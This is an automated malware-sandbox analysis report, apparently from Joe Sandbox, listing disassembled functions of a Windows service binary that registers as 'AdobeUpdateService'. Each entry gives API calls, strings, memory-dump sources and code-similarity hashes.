                                                                                                                                                                                                                                                                    • Opcode ID: e2e22a70dbd95b21f456f59282a0213a811955f47d7c623cdfc0833d9dcf18cc
                                                                                                                                                                                                                                                                    • Instruction ID: 34402626d38a9728df7e9b11658db42f6f8f7e161e27eba0645d41ce3f5bf331
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2e22a70dbd95b21f456f59282a0213a811955f47d7c623cdfc0833d9dcf18cc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5501D371B00B11EBDB209F76EC48B9777ECBF54B41304493AB956E3650EA78E8408A69
                                                                                                                                                                                                                                                                    Function 0041FB30 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0041FAA0,00000000,00000008,00405984), ref: 0041FBA7
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,0041FAA0,00000000,00000008,00405984), ref: 0041FC27
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                    • String ID: Closing inPipe %p$Closing outPipe %p$CommBridge$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2962429428-1143323105
                                                                                                                                                                                                                                                                    • Opcode ID: 2a3135dafd0f9304286105df91380c5b5f1a53f32146d0c127ed63ac37bcf816
                                                                                                                                                                                                                                                                    • Instruction ID: 0f7ac151626cc6776e72673ec142dc1ae90cb188b2ca2df04446cdc6e3645632
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a3135dafd0f9304286105df91380c5b5f1a53f32146d0c127ed63ac37bcf816
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C421F630740311A7CA20EF259D66F9B3654BB41B00F14017BF912A72E1CBACBD5286ED
                                                                                                                                                                                                                                                                    Function 004018B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RegisterServiceCtrlHandlerW.ADVAPI32(AdobeUpdateService,00401DB0), ref: 00401942
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004019A0
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                      • Part of subcall function 00401A30: GetLastError.KERNEL32(00000000,00000001,?,00401A1C), ref: 00401AC7
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • AdobeUpdateService, xrefs: 0040193D
                                                                                                                                                                                                                                                                    • ServiceMain: Started, xrefs: 00401922
                                                                                                                                                                                                                                                                    • ServiceMain: Failed to register the service with Register Service Control Handler with %d, xrefs: 004019A7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$Service$CtrlHandlerRegisterStatus
                                                                                                                                                                                                                                                                    • String ID: AdobeUpdateService$ServiceMain: Failed to register the service with Register Service Control Handler with %d$ServiceMain: Started
                                                                                                                                                                                                                                                                    • API String ID: 125077777-3162937321
                                                                                                                                                                                                                                                                    • Opcode ID: b74a3c793bce63fd3287ecdf9c99267635b26962f32db75fa19738fde18ddafd
                                                                                                                                                                                                                                                                    • Instruction ID: a0a6ef52c26ab5d4a2a010d99244e849a5362b380fe035aef843cf64b66cd91c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b74a3c793bce63fd3287ecdf9c99267635b26962f32db75fa19738fde18ddafd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25311171A40215ABE300DF6AED46B5A77A4EB55714F14423FE804A73D0EFB86904CBA9
                                                                                                                                                                                                                                                                    Function 0040B280 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70synchronizationCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,?,?,00404417,000000FF,000000FF,?,?), ref: 0040B317
                                                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,00404417,000000FF,000000FF,?,?), ref: 0040B32E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: EventObjectResetSingleWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in WaitforEvent $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 3162950495-832234452
                                                                                                                                                                                                                                                                    • Opcode ID: c206187707b054cee0fab18e90408e3dcbedc60c60ed156cedcffc0df12259e5
                                                                                                                                                                                                                                                                    • Instruction ID: ed9a0f1cae05966dad16be02516542e9fa838564d8aed4eb53f716a594107257
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c206187707b054cee0fab18e90408e3dcbedc60c60ed156cedcffc0df12259e5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C11108317802155BEB208B599C47B5A7748EB01B31F6407BBFC69E72D0CB65AC1046DC
                                                                                                                                                                                                                                                                    Function 00403E40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Event
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils$readDataCallBack : Setting event for read data callback
                                                                                                                                                                                                                                                                    • API String ID: 4201588131-2675428969
                                                                                                                                                                                                                                                                    • Opcode ID: 8d0fe7199531401063d2ff202e2e47731f7e3bb82e1b5197b15312e4f729c641
                                                                                                                                                                                                                                                                    • Instruction ID: 4701acb43a26968b7f86df0609fe2f1396b750fb55ec2d1e5461187ebc36528e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d0fe7199531401063d2ff202e2e47731f7e3bb82e1b5197b15312e4f729c641
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7101A532780224ABC6109B59EC42A5B7B5CEF65B137140077FA09A72D0CB7ABD508BED
                                                                                                                                                                                                                                                                    Function 00403EF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,BB40E64E,00000000,00000008,00000000,00497500,000000FF,?,004059AA), ref: 00403F86
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Event
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 4201588131-2429184316
                                                                                                                                                                                                                                                                    • Opcode ID: 5593ad2a507a23b0f7cd9ec3a726937450f1b810ed9e790710a49eada20f922d
                                                                                                                                                                                                                                                                    • Instruction ID: 925ded1f5c256d2d7ca2cb9baee336687e69f41301eaf6f7f9b06fcd4507b0e0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5593ad2a507a23b0f7cd9ec3a726937450f1b810ed9e790710a49eada20f922d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E310270740602ABD708CF15CD95B5ABBA8FF45715F10023AE609A7AD0DB7DF9508B9C
                                                                                                                                                                                                                                                                    Function 0040BB70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::locale::_Init.LIBCPMT ref: 0040BC81
                                                                                                                                                                                                                                                                      • Part of subcall function 0046B5AE: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,004C94C0,?,?,00468759,?,004C13D0,?), ref: 0046B60E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionInitRaisestd::locale::_
                                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                    • API String ID: 2020603122-1866435925
                                                                                                                                                                                                                                                                    • Opcode ID: 02f188c2921aaeed174908c3ed2f8e321f5381dadfdf40a2248bed2df7ff2a08
                                                                                                                                                                                                                                                                    • Instruction ID: 1c84d52ffb255289c8c822d3fe868fb1937b2b01e66fc20b4b360ecd81d27cfb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02f188c2921aaeed174908c3ed2f8e321f5381dadfdf40a2248bed2df7ff2a08
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 923104B1900704BBD310DF55C806B96B7A4FB00718F10422FE8049BAC1E7BEB5548BDA
                                                                                                                                                                                                                                                                    Function 00401770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ReportSvcStatus : Set Service Status returned Error %d, while setting state to %d , xrefs: 0040187E
                                                                                                                                                                                                                                                                    • ReportSvcStatus : Setting Service Status state to %d , xrefs: 00401800
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastServiceStatus
                                                                                                                                                                                                                                                                    • String ID: ReportSvcStatus : Set Service Status returned Error %d, while setting state to %d $ReportSvcStatus : Setting Service Status state to %d
                                                                                                                                                                                                                                                                    • API String ID: 1547514316-586121575
                                                                                                                                                                                                                                                                    • Opcode ID: b1f02e58a53d84fc7e1140356b729e7ad3c4ef579053cb0ed929bf1a68765758
                                                                                                                                                                                                                                                                    • Instruction ID: 2a8e6345c1da827573bafa61699fe2058e0613da09c450c42f65518c3299f71e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1f02e58a53d84fc7e1140356b729e7ad3c4ef579053cb0ed929bf1a68765758
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3431C1B1A40215AFE700DF5ADC85F5A7BA8EB04724F14417FF904A7391EF74AA008BA9
                                                                                                                                                                                                                                                                    Function 0270E5EA Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                    • Opcode ID: 23bf213e71c50ce3c7588569dbc33dff54ee26234ddd5d9921d5ac294631473a
                                                                                                                                                                                                                                                                    • Instruction ID: 44a2ebec639f902f4d08d3f80e2f08edf3ddd2dbc43506e9cbc25a2e311d9561
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23bf213e71c50ce3c7588569dbc33dff54ee26234ddd5d9921d5ac294631473a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F051E072601306EFDB2A8F94E8C4B6AB7E5EF44314F14492DE905572E2E771F889CB90
                                                                                                                                                                                                                                                                    Function 00414530 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004145A9
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0041461B
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0041463D
                                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00414660
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$LockitLockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2694047013-0
